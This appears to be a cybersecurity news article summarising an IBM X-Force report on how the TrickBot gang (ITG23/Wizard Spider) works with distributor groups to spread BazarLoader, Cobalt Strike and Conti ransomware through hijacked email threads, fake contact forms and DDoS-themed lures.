The creators of the notorious TrickBot virus have returned with new tactics to increase the malware’s distribution routes, eventually leading to the deployment of ransomware like Conti.
According to a report by IBM X-Force, the threat actors known as ITG23 and Wizard Spider have been discovered to collaborate with other cybercrime groups known as Hive0105, Hive0106 (aka TA551 or Shathak), and Hive0107. They’re part of an increasing number of operations used by cybercriminals to distribute proprietary malware.
Researchers Ole Villadsen and Charlotte Hammond state that these and other cybercrime suppliers infiltrate business networks with malware via hijacking email threads. They do so with the help of phony customer response forms and social engineering employees through a fake contact center known as BazarCall.
TrickBot has advanced from a banking trojan to a reconfigurable Windows-based crimeware solution since first appearing on the threat landscape in 2016.
It has also stood out for its resiliency, demonstrating the ability to maintain and update its toolset and infrastructure despite multiple attempts by enforcement agencies and industry groups to take it down.
The Wizard Spider gang is also credited with the creation of BazarLoader and a backdoor known as Anchor, in addition to TrickBot.
While earlier this year’s attacks focused on email campaigns providing Excel documents and a call center hoax known as “BazaCall” to distribute malware to businesses, recent breaches starting around June 2021 were distinguished by cooperation with two cybercrime groups to enhance its distribution infrastructure by deploying Cobalt Strike payloads via hacked email threads and phony online consumer inquiry forms on company websites.
This move raised the number of delivery attempts and expanded the variety of distribution techniques used to infect more prospective victims than ever.
The Hive0107 affiliate is said to have adopted a new tactic in one infection chain. It entails sending email messages to target firms alerting them that their websites have been executing distributed denial-of-service (DDoS) operations on their servers, with an additional proof’s link.
When the link is clicked, a ZIP package containing a malicious JavaScript (JS) downloader is downloaded, which contacts a remote URL to download the BazarLoader malware, which drops Cobalt Strike and TrickBot.
The researchers concluded that ITG23 has also adjusted to the ransomware economy by developing the Conti ransomware-as-a-service (RaaS) and employing its BazarLoader and Trickbot payloads to launch ransomware attacks.
This latest move indicates its ability to leverage its ties inside the cybercriminal ecosystem to increase the number of businesses infected with its virus.
